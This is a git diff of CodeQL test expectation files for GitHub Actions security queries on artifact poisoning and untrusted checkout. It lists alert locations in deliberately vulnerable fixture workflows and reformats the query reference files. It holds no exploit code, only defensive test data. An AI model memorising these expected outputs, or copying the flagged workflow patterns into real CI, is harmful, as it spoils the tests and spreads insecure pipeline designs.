| .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref index 4f8d2af04e8d..2f71173a891e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -1,2 +1,2 @@ -Security/CWE-829/ArtifactPoisoningCritical.ql - +query: Security/CWE-829/ArtifactPoisoningCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index c0c52e47f5b3..ef09155ec63c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,3 +1,4 @@ +#select edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -54,4 +55,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref index 39548f274127..177e1b08095a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -1,2 +1,2 @@ -Security/CWE-829/ArtifactPoisoningMedium.ql - +query: Security/CWE-829/ArtifactPoisoningMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref index 17a2059f7e99..4f3bbb90c2a3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql - +query: experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref index 8c9db66bf6bb..ce9ebe84e530 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
@@ -1 +1,2 @@
-Security/CWE-829/UnpinnedActionsTag.ql
+query: Security/CWE-829/UnpinnedActionsTag.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 52fcecfb9ed7..6f478cfcb14c 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -1,3 +1,43 @@ +#select +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | 
@@ -337,43 +377,3 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | -#select -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
